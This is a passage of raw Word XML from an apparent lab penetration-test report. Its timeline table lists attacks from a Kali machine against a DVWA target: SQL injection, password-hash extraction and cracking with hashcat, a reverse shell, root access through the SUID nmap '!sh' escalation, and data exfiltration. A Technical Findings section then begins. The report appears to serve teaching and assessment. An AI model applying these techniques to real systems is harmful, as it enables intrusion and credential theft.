          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="074E77EE" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Wireshark (HTTP filter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="5F8F6083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1B57D443" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1376C5B7" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>2026-07-24 ~19:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E8BB9DF" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>192.168.100.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4181" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61668949" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>SQL injection testing began — UNION SELECT payloads fired against /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>dvwa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/vulnerabilities/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqli</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35AD973A" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Wireshark (HTTP filter) + access.log.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="03D840E3" w14:textId="77777777" w:rsidTr="00F63671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627" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A7676A1" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DB1CDB0" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>2026-07-24 ~19:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="392CB28D" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>192.168.100.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4181" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02CAAE5B" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Full user table extracted — usernames and MD5 password hashes stolen from database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="348F9873" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Wireshark TCP stream</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="1CF39EB3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1A3DE510" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53894AD0" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>2026-07-24 ~19:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5507E9A6" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Kali (offline)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4181" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B9B6836" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">MD5 hashes cracked using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>hashcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> + rockyou.txt wordlist — plaintext passwords recovered</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03F9B078" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>hashcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="05CE703C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491BE7DB" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E9AAA8E" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>2026-07-25 23:02:51</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E8DD5F1" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>192.168.100.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4181" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4255358C" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Reverse shell established — target connected back to Kali on port 4444 via Command Execution exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59F42223" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Wireshark (port 4444 filter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="3E525353" w14:textId="77777777" w:rsidTr="00F63671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627" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BB46744" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32EA81C2" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>2026-07-25 23:08–23:17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6980B216" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>192.168.100.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4181" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="093CE231" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Active shell session — commands executed on target as www-data user (low privilege)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FBE305D" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Wireshark (PSH/ACK stream)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="00FF4413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77537496" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57AC8BBD" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>2026-07-25 23:17:14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1179A535" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>192.168.100.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4181" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02C3AA0A" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>First shell session closed — FIN/ACK confirms clean disconnect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="275EF58F" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Wireshark (port 4444 filter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="79FA258A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5BE33E34" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37D63EAA" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>2026-07-25 23:18:25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="312EC2AC" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>192.168.100.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4181" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69EEFBD3" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Second shell session opened — SUID </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> exploited via interactive mode </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(!</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>) to gain root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="103FC877" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Wireshark (port 4444 filter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="4DDD5293" w14:textId="77777777" w:rsidTr="00F63671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627" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C7F14B3" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0249CA5B" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>2026-07-25 07:51:19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63E4C8CB" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>192.168.100.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4181" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AF7F561" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH session opened for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>msfadmin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> from attacker machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="758D6EB7" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>auth.log</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="011D7A22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3EB5A10D" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58F04CC8" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>2026-07-26 04:52:44</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15BE856D" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>192.168.100.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4181" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4911683C" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Data exfiltration listener started on port 5555 on Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BD8A422" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Wireshark (port 5555 filter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="18C10930" w14:textId="77777777" w:rsidTr="00F6367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27" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62E30C4B" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B5B7DF4" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>2026-07-26 04:53:06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FFBBD60" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>192.168.100.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4181" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="379CED82" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Target connected to Kali on port 5555 — sensitive file transfer initiated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A5061B4" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Wireshark (port 5555 filter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="34E5FF7D" w14:textId="77777777" w:rsidTr="00F63671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627" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="408A4543" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="138FF87B" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>2026-07-26 04:57:26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="153C31B2" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>192.168.100.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4181" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="414B372E" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>FIN/ACK — file transfer completed, exfiltration successful</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D90BE6B" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Wireshark (port 5555 filter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7687388C" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C914068" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4. Technical Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B609ED7" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="250" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Finding 1 — SQL Injection (Critical)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60F7B" w:rsidRPr="00F63671" w14:paraId="098BB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34BA5567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00" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="6B6B2C34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Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="36683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F9035DA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Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A6EC42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SQL Injection — UNION-based</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="0E5C9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7D957AC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Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48054CB5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http://192.168.100.20/dvwa/vulnerabilities/sqli/?id=</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="651B50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0795EAE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Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
